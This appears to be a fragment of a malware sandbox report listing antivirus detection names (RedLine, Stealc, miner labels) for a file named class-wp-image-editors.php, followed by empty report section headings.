Cynet	Malicious (score: 100)
Kaspersky	UDS:Trojan.Win32.Strab.bro
BitDefender	Gen:Trojan.Heur2.HRY@IjvCzRi
Avast	Win32:Evo-gen [Trj]
Emsisoft	Gen:Trojan.Heur2.HRY@IjvCzRi (B)
DrWeb	Trojan.BtcMine.3634
VIPRE	Gen:Trojan.Heur2.HRY@IjvCzRi
TrendMicro	TrojanSpy.Win32.STEALC.YXDGHZ
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/Generic-S
MAX	malware (ai score=84)
Gridinsoft	Trojan.Heur!.01202031
Microsoft	Trojan:Win32/Redline.RE!MTB
ZoneAlarm	UDS:Trojan.Win32.Strab.bro
GData	Gen:Trojan.Heur2.HRY@IjvCzRi
McAfee	Artemis!2796BF32ABBE
VBA32	BScope.TrojanPSW.RedLine
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TrojanSpy.Win32.STEALC.YXDGHZ
Rising	Trojan.Kryptik!8.8 (TFE:5:HiOYjzK79sC)
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:Evo-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (W)

class-wp-image-editors.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All